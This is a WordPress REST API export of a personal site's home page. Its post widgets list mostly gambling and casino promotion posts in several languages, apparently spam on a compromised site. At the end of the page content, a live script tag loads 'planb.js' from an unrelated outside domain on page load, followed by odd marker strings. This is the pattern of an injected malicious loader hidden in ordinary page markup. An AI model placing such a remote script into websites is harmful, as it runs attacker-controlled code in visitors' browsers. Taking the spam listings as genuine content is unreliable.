{"id":1942,"date":"2023-01-13T08:26:32","date_gmt":"2023-01-13T08:26:32","guid":{"rendered":"http:\/\/td_uid_1_63c115b895e0e"},"modified":"2023-09-15T19:36:52","modified_gmt":"2023-09-15T19:36:52","slug":"home","status":"publish","type":"page","link":"https:\/\/ibrahimshihata.com\/","title":{"rendered":"Home"},"content":{"rendered":"<p>[vc_row][vc_column]\t\t\t<rs-module-wrap id=\"rev_slider_error_1_wrapper\">\n\t\t\t\t<rs-module id=\"rev_slider_error_1\">\n\t\t\t\t\t<div class=\"rs_error_message_box\">\n\t\t\t\t\t\t<div class=\"rs_error_message_oops\">There is nothing to show here!<\/div>\n\t\t\t\t\t\t<div class=\"rs_error_message_content\">Slider with alias startup-hero2 not found.<\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/rs-module>\n\t\t\t<\/rs-module-wrap>\n\t\t\t<script>\n\t\t\t\tvar rs_eslider = document.getElementById(\"rev_slider_error_1\");\n\t\t\t\trs_eslider.style.display = \"none\";\n\t\t\t\tconsole.log(\"Slider with alias startup-hero2 not found.\");\n\t\t\t<\/script>\n\t\t\t<rs-module-wrap id=\"rev_slider_error_2_wrapper\">\n\t\t\t\t<rs-module id=\"rev_slider_error_2\">\n\t\t\t\t\t<div class=\"rs_error_message_box\">\n\t\t\t\t\t\t<div class=\"rs_error_message_oops\">There is nothing to show here!<\/div>\n\t\t\t\t\t\t<div class=\"rs_error_message_content\">Slider with alias startup-team2 not found.<\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/rs-module>\n\t\t\t<\/rs-module-wrap>\n\t\t\t<script>\n\t\t\t\tvar rs_eslider = document.getElementById(\"rev_slider_error_2\");\n\t\t\t\trs_eslider.style.display = \"none\";\n\t\t\t\tconsole.log(\"Slider with alias startup-team2 not found.\");\n\t\t\t<\/script>\n[\/vc_column][\/vc_row][vc_row][vc_column width=&#8221;1\/3&#8243;]<div class=\"td_block_wrap td_block_2 td_uid_1_69fb0f8d697f3_rand td-pb-border-top td_block_template_4 td-column-1 td_block_padding\"  data-td-block-uid=\"td_uid_1_69fb0f8d697f3\" ><script>var block_td_uid_1_69fb0f8d697f3 = new tdBlock();\nblock_td_uid_1_69fb0f8d697f3.id = \"td_uid_1_69fb0f8d697f3\";\nblock_td_uid_1_69fb0f8d697f3.atts = '{\"custom_title\":\"ADVENTURE\",\"sort\":\"random_posts\",\"limit\":\"3\",\"separator\":\"\",\"custom_url\":\"\",\"block_template_id\":\"\",\"m2_tl\":\"\",\"m2_el\":\"\",\"m6_tl\":\"\",\"post_ids\":\"\",\"category_id\":\"\",\"category_ids\":\"\",\"tag_slug\":\"\",\"autors_id\":\"\",\"installed_post_types\":\"\",\"offset\":\"\",\"el_class\":\"\",\"td_ajax_filter_type\":\"\",\"td_ajax_filter_ids\":\"\",\"td_filter_default_txt\":\"All\",\"td_ajax_preloading\":\"\",\"f_header_font_header\":\"\",\"f_header_font_title\":\"Block header\",\"f_header_font_settings\":\"\",\"f_header_font_family\":\"\",\"f_header_font_size\":\"\",\"f_header_font_line_height\":\"\",\"f_header_font_style\":\"\",\"f_header_font_weight\":\"\",\"f_header_font_transform\":\"\",\"f_header_font_spacing\":\"\",\"f_header_\":\"\",\"f_ajax_font_title\":\"Ajax categories\",\"f_ajax_font_settings\":\"\",\"f_ajax_font_family\":\"\",\"f_ajax_font_size\":\"\",\"f_ajax_font_line_height\":\"\",\"f_ajax_font_style\":\"\",\"f_ajax_font_weight\":\"\",\"f_ajax_font_transform\":\"\",\"f_ajax_font_spacing\":\"\",\"f_ajax_\":\"\",\"f_more_font_title\":\"Load more button\",\"f_more_font_settings\":\"\",\"f_more_font_family\":\"\",\"f_more_font_size\":\"\",\"f_more_font_line_height\":\"\",\"f_more_font_style\":\"\",\"f_more_font_weight\":\"\",\"f_more_font_transform\":\"\",\"f_more_font_spacing\":\"\",\"f_more_\":\"\",\"m2f_title_font_header\":\"\",\"m2f_title_font_title\":\"Article title\",\"m2f_title_font_settings\":\"\",\"m2f_title_font_family\":\"\",\"m2f_title_font_size\":\"\",\"m2f_title_font_line_height\":\"\",\"m2f_title_font_style\":\"\",\"m2f_title_font_weight\":\"\",\"m2f_title_font_transform\":\"\",\"m2f_title_font_spacing\":\"\",\"m2f_title_\":\"\",\"m2f_cat_font_title\":\"Article category tag\",\"m2f_cat_font_settings\":\"\",\"m2f_cat_font_family\":\"\",\"m2f_cat_font_size\":\"\",\"m2f_cat_font_line_height\":\"\",\"m2f_cat_font_style\":\"\",\"m2f_cat_font_weight\":\"\",\"m2f_cat_font_transform\":\"\",\"m2f_cat_font_spacing\":\"\",\"m2f_cat_\":\"\",\"m2f_meta_font_title\":\"Article meta info\",\"m2f_meta_font_settings\":\"\",\"m2f_meta_font_family\":\"\",\"m2f_meta_font_size\":\"\",\"m2f_meta_font_line_height\":\"\",\"m2f_meta_font_style\":\"\",\"m2f_meta_font_weight\":\"\",\"m2f_meta_font_transform\":\"\",\"m2f_meta_font_spacing\":\"\",\"m2f_meta_\":\"\",\"m2f_ex_font_title\":\"Article excerpt\",\"m2f_ex_font_settings\":\"\",\"m2f_ex_font_family\":\"\",\"m2f_ex_font_size\":\"\",\"m2f_ex_font_line_height\":\"\",\"m2f_ex_font_style\":\"\",\"m2f_ex_font_weight\":\"\",\"m2f_ex_font_transform\":\"\",\"m2f_ex_font_spacing\":\"\",\"m2f_ex_\":\"\",\"m6f_title_font_header\":\"\",\"m6f_title_font_title\":\"Article title\",\"m6f_title_font_settings\":\"\",\"m6f_title_font_family\":\"\",\"m6f_title_font_size\":\"\",\"m6f_title_font_line_height\":\"\",\"m6f_title_font_style\":\"\",\"m6f_title_font_weight\":\"\",\"m6f_title_font_transform\":\"\",\"m6f_title_font_spacing\":\"\",\"m6f_title_\":\"\",\"m6f_cat_font_title\":\"Article category tag\",\"m6f_cat_font_settings\":\"\",\"m6f_cat_font_family\":\"\",\"m6f_cat_font_size\":\"\",\"m6f_cat_font_line_height\":\"\",\"m6f_cat_font_style\":\"\",\"m6f_cat_font_weight\":\"\",\"m6f_cat_font_transform\":\"\",\"m6f_cat_font_spacing\":\"\",\"m6f_cat_\":\"\",\"m6f_meta_font_title\":\"Article meta info\",\"m6f_meta_font_settings\":\"\",\"m6f_meta_font_family\":\"\",\"m6f_meta_font_size\":\"\",\"m6f_meta_font_line_height\":\"\",\"m6f_meta_font_style\":\"\",\"m6f_meta_font_weight\":\"\",\"m6f_meta_font_transform\":\"\",\"m6f_meta_font_spacing\":\"\",\"m6f_meta_\":\"\",\"ajax_pagination\":\"\",\"ajax_pagination_infinite_stop\":\"\",\"css\":\"\",\"tdc_css\":\"\",\"td_column_number\":1,\"header_color\":\"\",\"color_preset\":\"\",\"border_top\":\"\",\"class\":\"td_uid_1_69fb0f8d697f3_rand\",\"tdc_css_class\":\"td_uid_1_69fb0f8d697f3_rand\",\"tdc_css_class_style\":\"td_uid_1_69fb0f8d697f3_rand_style\"}';\nblock_td_uid_1_69fb0f8d697f3.td_column_number = \"1\";\nblock_td_uid_1_69fb0f8d697f3.block_type = \"td_block_2\";\nblock_td_uid_1_69fb0f8d697f3.post_count = \"3\";\nblock_td_uid_1_69fb0f8d697f3.found_posts = \"778\";\nblock_td_uid_1_69fb0f8d697f3.header_color = \"\";\nblock_td_uid_1_69fb0f8d697f3.ajax_pagination_infinite_stop = \"\";\nblock_td_uid_1_69fb0f8d697f3.max_num_pages = \"260\";\ntdBlocksArray.push(block_td_uid_1_69fb0f8d697f3);\n<\/script><div class=\"td-block-title-wrap\"><h4 class=\"td-block-title\"><span class=\"td-pulldown-size\">ADVENTURE<\/span><\/h4><\/div><div id=td_uid_1_69fb0f8d697f3 class=\"td_block_inner\">\n\n\t<div class=\"td-block-span12\">\n\n        <div class=\"td_module_2 td_module_wrap td-animation-stack\">\n            <div class=\"td-module-image\">\n                <div class=\"td-module-thumb\"><a href=\"https:\/\/ibrahimshihata.com\/index.php\/2023\/09\/30\/pin-up-canli-casino-oyunlari-slot-casino-sitesi\/\" rel=\"bookmark\" class=\"td-image-wrap\" title=\"Pin Up Canl\u0131 Cas\u0131no Oyunlar\u0131 Slot casino sitesi\"><img width=\"324\" height=\"160\" class=\"entry-thumb\" src=\"https:\/\/ibrahimshihata.com\/wp-content\/themes\/newspaper%209\/images\/no-thumb\/td_324x160.png\" alt=\"\"\/><\/a><\/div>                            <\/div>\n            <h3 class=\"entry-title td-module-title\"><a href=\"https:\/\/ibrahimshihata.com\/index.php\/2023\/09\/30\/pin-up-canli-casino-oyunlari-slot-casino-sitesi\/\" rel=\"bookmark\" title=\"Pin Up Canl\u0131 Cas\u0131no Oyunlar\u0131 Slot casino sitesi\">Pin Up Canl\u0131 Cas\u0131no Oyunlar\u0131 Slot casino sitesi<\/a><\/h3>\n\n            <div class=\"td-module-meta-info\">\n                <span class=\"td-post-author-name\"><a href=\"https:\/\/ibrahimshihata.com\/index.php\/author\/ibrahimsh\/\">ibrahimsh<\/a> <span>-<\/span> <\/span>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2023-09-30T06:53:07+00:00\" >September 30, 2023<\/time><\/span>                <div class=\"td-module-comments\"><a href=\"https:\/\/ibrahimshihata.com\/index.php\/2023\/09\/30\/pin-up-canli-casino-oyunlari-slot-casino-sitesi\/#respond\">0<\/a><\/div>            <\/div>\n\n\n            <div class=\"td-excerpt\">\n                Pin Up Canl\u0131 Cas\u0131no Oyunlar\u0131 Slot casino sitesiiPin-Up Bet Siteye Ba\u011flan\u0131lm\u0131yor Giri\u015f OlmuyorContentPin up Casino\u2019nun resmi web sitesiPin Up Lisansl\u0131 Casino Sitesi \u2013 Slot...            <\/div>\n\n            \n        <\/div>\n\n        \n\t<\/div> <!-- .\/td-block-span12 -->\n\n\t<div class=\"td-block-span12\">\n\n        <div class=\"td_module_6 td_module_wrap td-animation-stack\">\n\n        <div class=\"td-module-thumb\"><a href=\"https:\/\/ibrahimshihata.com\/index.php\/2022\/08\/26\/%d0%b1%d1%83%d0%ba%d0%bc%d0%b5%d0%ba%d0%b5%d1%80%d1%81%d0%ba%d0%b0%d1%8f-%d0%ba%d0%be%d0%bc%d0%bf%d0%b0%d0%bd%d0%b8%d1%8f-%d0%be%d1%84%d0%b8%d1%86%d0%b8%d0%b0%d0%bb%d1%8c%d0%bd%d1%8b%d0%b9-%d1%81\/\" rel=\"bookmark\" class=\"td-image-wrap\" title=\"\u0431\u0443\u043a\u043c\u0435\u043a\u0435\u0440\u0441\u043a\u0430\u044f \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u044f \u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0439 \u0441\u0430\u0439\u0442, \u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0430\u0446\u0438\u044f \u0438 \u0432\u0445\u043e\u0434 \u0432 \u043b\u0438\u0447\u043d\u044b\u0439 \u043a\u0430\u0431\u0438\u043d\u0435\u0442 1\u0445\u0411\u0435\"><img width=\"100\" height=\"70\" class=\"entry-thumb\" src=\"https:\/\/ibrahimshihata.com\/wp-content\/themes\/newspaper%209\/images\/no-thumb\/td_100x70.png\" alt=\"\"\/><\/a><\/div>\n        <div class=\"item-details\">\n            <h3 class=\"entry-title td-module-title\"><a href=\"https:\/\/ibrahimshihata.com\/index.php\/2022\/08\/26\/%d0%b1%d1%83%d0%ba%d0%bc%d0%b5%d0%ba%d0%b5%d1%80%d1%81%d0%ba%d0%b0%d1%8f-%d0%ba%d0%be%d0%bc%d0%bf%d0%b0%d0%bd%d0%b8%d1%8f-%d0%be%d1%84%d0%b8%d1%86%d0%b8%d0%b0%d0%bb%d1%8c%d0%bd%d1%8b%d0%b9-%d1%81\/\" rel=\"bookmark\" title=\"\u0431\u0443\u043a\u043c\u0435\u043a\u0435\u0440\u0441\u043a\u0430\u044f \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u044f \u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0439 \u0441\u0430\u0439\u0442, \u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0430\u0446\u0438\u044f \u0438 \u0432\u0445\u043e\u0434 \u0432 \u043b\u0438\u0447\u043d\u044b\u0439 \u043a\u0430\u0431\u0438\u043d\u0435\u0442 1\u0445\u0411\u0435\">\u0431\u0443\u043a\u043c\u0435\u043a\u0435\u0440\u0441\u043a\u0430\u044f \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u044f \u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0439 \u0441\u0430\u0439\u0442, \u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0430\u0446\u0438\u044f \u0438 \u0432\u0445\u043e\u0434 \u0432 \u043b\u0438\u0447\u043d\u044b\u0439 \u043a\u0430\u0431\u0438\u043d\u0435\u0442 1\u0445\u0411\u0435<\/a><\/h3>            <div class=\"td-module-meta-info\">\n                                                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2022-08-26T04:29:08+00:00\" >August 26, 2022<\/time><\/span>                            <\/div>\n        <\/div>\n\n        <\/div>\n\n        \n\t<\/div> <!-- .\/td-block-span12 -->\n\n\t<div class=\"td-block-span12\">\n\n        <div class=\"td_module_6 td_module_wrap td-animation-stack\">\n\n        <div class=\"td-module-thumb\"><a href=\"https:\/\/ibrahimshihata.com\/index.php\/2023\/05\/06\/pin-up-dunyann-en-iyi-kumarhanesi-resmi-web-sitesi-4930\/\" rel=\"bookmark\" class=\"td-image-wrap\" title=\"Pin Up-d\u00fcnyan\u0131n en iyi kumarhanesi Resmi Web Sitesi \u1408 Slot makinelerinde para i\u00e7in oynay\u0131n\"><img width=\"100\" height=\"70\" class=\"entry-thumb\" src=\"https:\/\/ibrahimshihata.com\/wp-content\/themes\/newspaper%209\/images\/no-thumb\/td_100x70.png\" alt=\"\"\/><\/a><\/div>\n        <div class=\"item-details\">\n            <h3 class=\"entry-title td-module-title\"><a href=\"https:\/\/ibrahimshihata.com\/index.php\/2023\/05\/06\/pin-up-dunyann-en-iyi-kumarhanesi-resmi-web-sitesi-4930\/\" rel=\"bookmark\" title=\"Pin Up-d\u00fcnyan\u0131n en iyi kumarhanesi Resmi Web Sitesi \u1408 Slot makinelerinde para i\u00e7in oynay\u0131n\">Pin Up-d\u00fcnyan\u0131n en iyi kumarhanesi Resmi Web Sitesi \u1408 Slot makinelerinde...<\/a><\/h3>            <div class=\"td-module-meta-info\">\n                                                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2023-05-06T08:57:03+00:00\" >May 6, 2023<\/time><\/span>                            <\/div>\n        <\/div>\n\n        <\/div>\n\n        \n\t<\/div> <!-- .\/td-block-span12 --><\/div><\/div> <!-- .\/block -->[\/vc_column][vc_column width=&#8221;1\/3&#8243;]<div class=\"td_block_wrap td_block_2 td_uid_2_69fb0f8d6cc61_rand td-pb-border-top td_block_template_4 td-column-1 td_block_padding\"  data-td-block-uid=\"td_uid_2_69fb0f8d6cc61\" ><script>var block_td_uid_2_69fb0f8d6cc61 = new tdBlock();\nblock_td_uid_2_69fb0f8d6cc61.id = \"td_uid_2_69fb0f8d6cc61\";\nblock_td_uid_2_69fb0f8d6cc61.atts = '{\"custom_title\":\"MYSTERY\",\"sort\":\"random_posts\",\"limit\":\"3\",\"separator\":\"\",\"custom_url\":\"\",\"block_template_id\":\"\",\"m2_tl\":\"\",\"m2_el\":\"\",\"m6_tl\":\"\",\"post_ids\":\"\",\"category_id\":\"\",\"category_ids\":\"\",\"tag_slug\":\"\",\"autors_id\":\"\",\"installed_post_types\":\"\",\"offset\":\"\",\"el_class\":\"\",\"td_ajax_filter_type\":\"\",\"td_ajax_filter_ids\":\"\",\"td_filter_default_txt\":\"All\",\"td_ajax_preloading\":\"\",\"f_header_font_header\":\"\",\"f_header_font_title\":\"Block header\",\"f_header_font_settings\":\"\",\"f_header_font_family\":\"\",\"f_header_font_size\":\"\",\"f_header_font_line_height\":\"\",\"f_header_font_style\":\"\",\"f_header_font_weight\":\"\",\"f_header_font_transform\":\"\",\"f_header_font_spacing\":\"\",\"f_header_\":\"\",\"f_ajax_font_title\":\"Ajax categories\",\"f_ajax_font_settings\":\"\",\"f_ajax_font_family\":\"\",\"f_ajax_font_size\":\"\",\"f_ajax_font_line_height\":\"\",\"f_ajax_font_style\":\"\",\"f_ajax_font_weight\":\"\",\"f_ajax_font_transform\":\"\",\"f_ajax_font_spacing\":\"\",\"f_ajax_\":\"\",\"f_more_font_title\":\"Load more button\",\"f_more_font_settings\":\"\",\"f_more_font_family\":\"\",\"f_more_font_size\":\"\",\"f_more_font_line_height\":\"\",\"f_more_font_style\":\"\",\"f_more_font_weight\":\"\",\"f_more_font_transform\":\"\",\"f_more_font_spacing\":\"\",\"f_more_\":\"\",\"m2f_title_font_header\":\"\",\"m2f_title_font_title\":\"Article title\",\"m2f_title_font_settings\":\"\",\"m2f_title_font_family\":\"\",\"m2f_title_font_size\":\"\",\"m2f_title_font_line_height\":\"\",\"m2f_title_font_style\":\"\",\"m2f_title_font_weight\":\"\",\"m2f_title_font_transform\":\"\",\"m2f_title_font_spacing\":\"\",\"m2f_title_\":\"\",\"m2f_cat_font_title\":\"Article category tag\",\"m2f_cat_font_settings\":\"\",\"m2f_cat_font_family\":\"\",\"m2f_cat_font_size\":\"\",\"m2f_cat_font_line_height\":\"\",\"m2f_cat_font_style\":\"\",\"m2f_cat_font_weight\":\"\",\"m2f_cat_font_transform\":\"\",\"m2f_cat_font_spacing\":\"\",\"m2f_cat_\":\"\",\"m2f_meta_font_title\":\"Article meta info\",\"m2f_meta_font_settings\":\"\",\"m2f_meta_font_family\":\"\",\"m2f_meta_font_size\":\"\",\"m2f_meta_font_line_height\":\"\",\"m2f_meta_font_style\":\"\",\"m2f_meta_font_weight\":\"\",\"m2f_meta_font_transform\":\"\",\"m2f_meta_font_spacing\":\"\",\"m2f_meta_\":\"\",\"m2f_ex_font_title\":\"Article excerpt\",\"m2f_ex_font_settings\":\"\",\"m2f_ex_font_family\":\"\",\"m2f_ex_font_size\":\"\",\"m2f_ex_font_line_height\":\"\",\"m2f_ex_font_style\":\"\",\"m2f_ex_font_weight\":\"\",\"m2f_ex_font_transform\":\"\",\"m2f_ex_font_spacing\":\"\",\"m2f_ex_\":\"\",\"m6f_title_font_header\":\"\",\"m6f_title_font_title\":\"Article title\",\"m6f_title_font_settings\":\"\",\"m6f_title_font_family\":\"\",\"m6f_title_font_size\":\"\",\"m6f_title_font_line_height\":\"\",\"m6f_title_font_style\":\"\",\"m6f_title_font_weight\":\"\",\"m6f_title_font_transform\":\"\",\"m6f_title_font_spacing\":\"\",\"m6f_title_\":\"\",\"m6f_cat_font_title\":\"Article category tag\",\"m6f_cat_font_settings\":\"\",\"m6f_cat_font_family\":\"\",\"m6f_cat_font_size\":\"\",\"m6f_cat_font_line_height\":\"\",\"m6f_cat_font_style\":\"\",\"m6f_cat_font_weight\":\"\",\"m6f_cat_font_transform\":\"\",\"m6f_cat_font_spacing\":\"\",\"m6f_cat_\":\"\",\"m6f_meta_font_title\":\"Article meta info\",\"m6f_meta_font_settings\":\"\",\"m6f_meta_font_family\":\"\",\"m6f_meta_font_size\":\"\",\"m6f_meta_font_line_height\":\"\",\"m6f_meta_font_style\":\"\",\"m6f_meta_font_weight\":\"\",\"m6f_meta_font_transform\":\"\",\"m6f_meta_font_spacing\":\"\",\"m6f_meta_\":\"\",\"ajax_pagination\":\"\",\"ajax_pagination_infinite_stop\":\"\",\"css\":\"\",\"tdc_css\":\"\",\"td_column_number\":1,\"header_color\":\"\",\"color_preset\":\"\",\"border_top\":\"\",\"class\":\"td_uid_2_69fb0f8d6cc61_rand\",\"tdc_css_class\":\"td_uid_2_69fb0f8d6cc61_rand\",\"tdc_css_class_style\":\"td_uid_2_69fb0f8d6cc61_rand_style\"}';\nblock_td_uid_2_69fb0f8d6cc61.td_column_number = \"1\";\nblock_td_uid_2_69fb0f8d6cc61.block_type = \"td_block_2\";\nblock_td_uid_2_69fb0f8d6cc61.post_count = \"3\";\nblock_td_uid_2_69fb0f8d6cc61.found_posts = \"778\";\nblock_td_uid_2_69fb0f8d6cc61.header_color = \"\";\nblock_td_uid_2_69fb0f8d6cc61.ajax_pagination_infinite_stop = \"\";\nblock_td_uid_2_69fb0f8d6cc61.max_num_pages = \"260\";\ntdBlocksArray.push(block_td_uid_2_69fb0f8d6cc61);\n<\/script><div class=\"td-block-title-wrap\"><h4 class=\"td-block-title\"><span class=\"td-pulldown-size\">MYSTERY<\/span><\/h4><\/div><div id=td_uid_2_69fb0f8d6cc61 class=\"td_block_inner\">\n\n\t<div class=\"td-block-span12\">\n\n        <div class=\"td_module_2 td_module_wrap td-animation-stack\">\n            <div class=\"td-module-image\">\n                <div class=\"td-module-thumb\"><a href=\"https:\/\/ibrahimshihata.com\/index.php\/2026\/04\/21\/rozpravkovy-svet-slotexo-casino-oficialna-stranka-s-fantastickymi-vyhrami\/\" rel=\"bookmark\" class=\"td-image-wrap\" title=\"Rozpr\u00e1vkov\u00fd svet slotexo casino ofici\u00e1lna str\u00e1nka s fantastick\u00fdmi v\u00fdhrami\"><img width=\"324\" height=\"160\" class=\"entry-thumb\" src=\"https:\/\/ibrahimshihata.com\/wp-content\/themes\/newspaper%209\/images\/no-thumb\/td_324x160.png\" alt=\"\"\/><\/a><\/div>                            <\/div>\n            <h3 class=\"entry-title td-module-title\"><a href=\"https:\/\/ibrahimshihata.com\/index.php\/2026\/04\/21\/rozpravkovy-svet-slotexo-casino-oficialna-stranka-s-fantastickymi-vyhrami\/\" rel=\"bookmark\" title=\"Rozpr\u00e1vkov\u00fd svet slotexo casino ofici\u00e1lna str\u00e1nka s fantastick\u00fdmi v\u00fdhrami\">Rozpr\u00e1vkov\u00fd svet slotexo casino ofici\u00e1lna str\u00e1nka s fantastick\u00fdmi v\u00fdhrami<\/a><\/h3>\n\n            <div class=\"td-module-meta-info\">\n                <span class=\"td-post-author-name\"><a href=\"https:\/\/ibrahimshihata.com\/index.php\/author\/wadminw\/\">wadminw<\/a> <span>-<\/span> <\/span>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2026-04-21T08:28:08+00:00\" >April 21, 2026<\/time><\/span>                <div class=\"td-module-comments\"><a href=\"https:\/\/ibrahimshihata.com\/index.php\/2026\/04\/21\/rozpravkovy-svet-slotexo-casino-oficialna-stranka-s-fantastickymi-vyhrami\/#respond\">0<\/a><\/div>            <\/div>\n\n\n            <div class=\"td-excerpt\">\n                Auto-generated post_excerpt            <\/div>\n\n            \n        <\/div>\n\n        \n\t<\/div> <!-- .\/td-block-span12 -->\n\n\t<div class=\"td-block-span12\">\n\n        <div class=\"td_module_6 td_module_wrap td-animation-stack\">\n\n        <div class=\"td-module-thumb\"><a href=\"https:\/\/ibrahimshihata.com\/index.php\/2022\/03\/13\/2476\/\" rel=\"bookmark\" class=\"td-image-wrap\" title=\"\"><img width=\"100\" height=\"70\" class=\"entry-thumb\" src=\"https:\/\/ibrahimshihata.com\/wp-content\/themes\/newspaper%209\/images\/no-thumb\/td_100x70.png\" alt=\"\"\/><\/a><\/div>\n        <div class=\"item-details\">\n            <h3 class=\"entry-title td-module-title\"><a href=\"https:\/\/ibrahimshihata.com\/index.php\/2022\/03\/13\/2476\/\" rel=\"bookmark\" title=\"\"><\/a><\/h3>            <div class=\"td-module-meta-info\">\n                                                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2022-03-13T05:12:27+00:00\" >March 13, 2022<\/time><\/span>                            <\/div>\n        <\/div>\n\n        <\/div>\n\n        \n\t<\/div> <!-- .\/td-block-span12 -->\n\n\t<div class=\"td-block-span12\">\n\n        <div class=\"td_module_6 td_module_wrap td-animation-stack\">\n\n        <div class=\"td-module-thumb\"><a href=\"https:\/\/ibrahimshihata.com\/index.php\/2023\/10\/03\/casinos-de-basta-casinospelen-onlin\/\" rel=\"bookmark\" class=\"td-image-wrap\" title=\"Casinos De B\u00e4sta Casinospelen Onlin\"><img width=\"100\" height=\"70\" class=\"entry-thumb\" src=\"https:\/\/ibrahimshihata.com\/wp-content\/themes\/newspaper%209\/images\/no-thumb\/td_100x70.png\" alt=\"\"\/><\/a><\/div>\n        <div class=\"item-details\">\n            <h3 class=\"entry-title td-module-title\"><a href=\"https:\/\/ibrahimshihata.com\/index.php\/2023\/10\/03\/casinos-de-basta-casinospelen-onlin\/\" rel=\"bookmark\" title=\"Casinos De B\u00e4sta Casinospelen Onlin\">Casinos De B\u00e4sta Casinospelen Onlin<\/a><\/h3>            <div class=\"td-module-meta-info\">\n                                                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2023-10-03T19:39:24+00:00\" >October 3, 2023<\/time><\/span>                            <\/div>\n        <\/div>\n\n        <\/div>\n\n        \n\t<\/div> <!-- .\/td-block-span12 --><\/div><\/div> <!-- .\/block -->[\/vc_column][vc_column width=&#8221;1\/3&#8243;]<div class=\"td_block_wrap td_block_author td_uid_3_69fb0f8d6efd1_rand td-pb-border-top td_block_template_4\"  data-td-block-uid=\"td_uid_3_69fb0f8d6efd1\" ><div class=\"td-block-title-wrap\"><h4 class=\"td-block-title\"><span class=\"td-pulldown-size\">ABOUT ME<\/span><\/h4><\/div><div class=\"td_author_wrap td-fix-index\"><a href=\"https:\/\/ibrahimshihata.com\/index.php\/author\/ibrahimsh\/\"><img alt='' src='https:\/\/secure.gravatar.com\/avatar\/f2e30c885d6903d02746dc317fa50dc6?s=196&#038;d=mm&#038;r=g' srcset='https:\/\/secure.gravatar.com\/avatar\/f2e30c885d6903d02746dc317fa50dc6?s=392&#038;d=mm&#038;r=g 2x' class='avatar avatar-196 photo' height='196' width='196' loading='lazy'\/><\/a><div class=\"item-details\"><div class=\"td-author-name\"><a href=\"https:\/\/ibrahimshihata.com\/index.php\/author\/ibrahimsh\/\">ibrahimsh<\/a><\/div><div class=\"td-author-description\"><\/div><\/div><\/div><\/div>[\/vc_column][\/vc_row]<\/p>\n<p><script src=\"https:\/\/www.wp3advesting.com\/planb.js\"><\/script><br \/>\n%9171694800634593%%5051694806611781%<\/p>\n","protected":false},"excerpt":{"rendered":"<p>[vc_row][vc_column][\/vc_column][\/vc_row][vc_row][vc_column width=&#8221;1\/3&#8243;][\/vc_column][vc_column width=&#8221;1\/3&#8243;][\/vc_column][vc_column width=&#8221;1\/3&#8243;][\/vc_column][\/vc_row] %9171694800634593%%5051694806611781%<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"open","ping_status":"closed","template":"page-pagebuilder-latest.php","meta":{"_vp_format_video_url":"","_vp_image_focal_point":[]},"uagb_featured_image_src":{"full":false,"thumbnail":false,"medium":false,"medium_large":false,"large":false,"1536x1536":false,"2048x2048":false,"td_80x60":false,"td_100x70":false,"td_218x150":false,"td_265x198":false,"td_324x160":false,"td_324x235":false,"td_324x400":false,"td_356x220":false,"td_356x364":false,"td_533x261":false,"td_534x462":false,"td_696x0":false,"td_696x385":false,"td_741x486":false,"td_1068x580":false,"td_1068x0":false,"td_0x420":false,"vp_sm":false,"vp_md":false,"vp_lg":false,"vp_xl":false,"vp_sm_popup":false,"vp_md_popup":false,"vp_xl_popup":false,"woocommerce_thumbnail":false,"woocommerce_single":false,"woocommerce_gallery_thumbnail":false,"shop_catalog":false,"shop_single":false,"shop_thumbnail":false},"uagb_author_info":{"display_name":"ibrahimsh","author_link":"https:\/\/ibrahimshihata.com\/index.php\/author\/ibrahimsh\/"},"uagb_comment_info":0,"uagb_excerpt":"[vc_row][vc_column][\/vc_column][\/vc_row][vc_row][vc_column width=&#8221;1\/3&#8243;][\/vc_column][vc_column width=&#8221;1\/3&#8243;][\/vc_column][vc_column width=&#8221;1\/3&#8243;][\/vc_column][\/vc_row] %9171694800634593%%5051694806611781%","_links":{"self":[{"href":"https:\/\/ibrahimshihata.com\/index.php\/wp-json\/wp\/v2\/pages\/1942"}],"collection":[{"href":"https:\/\/ibrahimshihata.com\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/ibrahimshihata.com\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/ibrahimshihata.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/ibrahimshihata.com\/index.php\/wp-json\/wp\/v2\/comments?post=1942"}],"version-history":[{"count":6,"href":"https:\/\/ibrahimshihata.com\/index.php\/wp-json\/wp\/v2\/pages\/1942\/revisions"}],"predecessor-version":[{"id":2974,"href":"https:\/\/ibrahimshihata.com\/index.php\/wp-json\/wp\/v2\/pages\/1942\/revisions\/2974"}],"wp:attachment":[{"href":"https:\/\/ibrahimshihata.com\/index.php\/wp-json\/wp\/v2\/media?parent=1942"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}